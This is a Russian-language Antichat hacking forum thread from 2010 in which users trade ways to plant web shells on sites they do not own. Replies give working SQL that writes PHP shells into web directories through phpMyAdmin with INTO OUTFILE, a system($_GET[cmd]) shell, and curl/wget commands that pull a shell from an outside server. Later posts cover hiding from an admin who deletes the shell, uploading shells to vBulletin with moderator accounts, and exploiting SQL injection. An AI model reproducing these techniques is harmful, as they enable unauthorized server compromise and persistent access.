Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.03.2010, 22:55
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
|
|
|
28.03.2010, 23:26
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от 547
а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
Cоздаем таблицу, например 'hack' с колонкой 'shell'
CREATE TABLE 'hack' ('shell' TEXT);
Записываем в базу скрипт который должен инклудить шелл с сервера
INSERT INTO 'hack' ('shell') VALUES ('<? include 'http://сервер с шеллом' ?>');
Ищем папку с правами на запись uploads,images,etc.
Подставляем путь в запрос: SELECT shell FROM 'hack' INTO OUTFILE '/home/сайт/www/uploads/shell.php';
Последний раз редактировалось Redwood; 29.03.2010 в 04:00..
|
|
|
|
29.03.2010, 00:00
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';
www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt
путь нужен полюбом
|
|
|
|
29.03.2010, 00:38
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Gorev
SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';
www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt
путь нужен полюбом
ну да, но меня интересовало как залить шелл именно через phpmyadmin.
спсасибо но я уже разобрался  просто ты похоже описал как залить шелл через сиквел инжекцию...
кстати единственное с чем возникла трудность при заливке так это синтаксис
select * from 'table' into outfile 'путь' -не правильно
select * from `table` into outfile 'путь' -так правильно
а весь прикол в кавычках оказалсо
ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...
как можно по другому остатся в системе?
Последний раз редактировалось 547; 29.03.2010 в 02:05..
|
|
|
|
29.03.2010, 04:47
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от 547
ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...как можно по другому остатся в системе?
Возможно на сервере кроном гоняеться скрипт, который дропает файлы по дате создания и весу.
|
|
|
|
29.03.2010, 06:23
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от Serafim
Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
Жду предложений по этому поводу.  O_o а по человечески можешь объяснить?
|
|
|
|
29.03.2010, 08:29
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
547 ты не прав, я описал именно как залить шелл через пхпмайадмин, обращатся все равно через БД, поэтому и синтаксис одинаковый, я не раз заливал через пхпадмина именно так, конечно нужен юзер рут и папка с правами на запись и соответсвенно сам путь до папки.
а по поводу как спрятать шелл от злобного админа есть способ который описал Dimi4 ..вот собственно и link
смотри в самом низу статьи |
|
|
|
29.03.2010, 10:51
|
|
Участник форума
Регистрация: 24.10.2006
Сообщений: 261
Провел на форуме:
3227914
Репутация:
174
|
|
Сообщение от [Feldmarschall]
O_o а по человечески можешь объяснить?
Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают. 
|
|
|
|
29.03.2010, 14:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'
ошибка :
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/admin/www/view_all.php on line 44
Warning: Division by zero in /usr/home/admin/www/view_all.php on line 250
Warning: Division by zero in /usr/home/admin/www/view_all.php on line 251
|
|
|
|
29.03.2010, 15:28
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
Сообщение от jecka3000
как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'
Так же как и всегда.
Последний раз редактировалось Jerri; 29.03.2010 в 15:31..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2022826){kind=avatar}
Похожие темы
Линейный вид
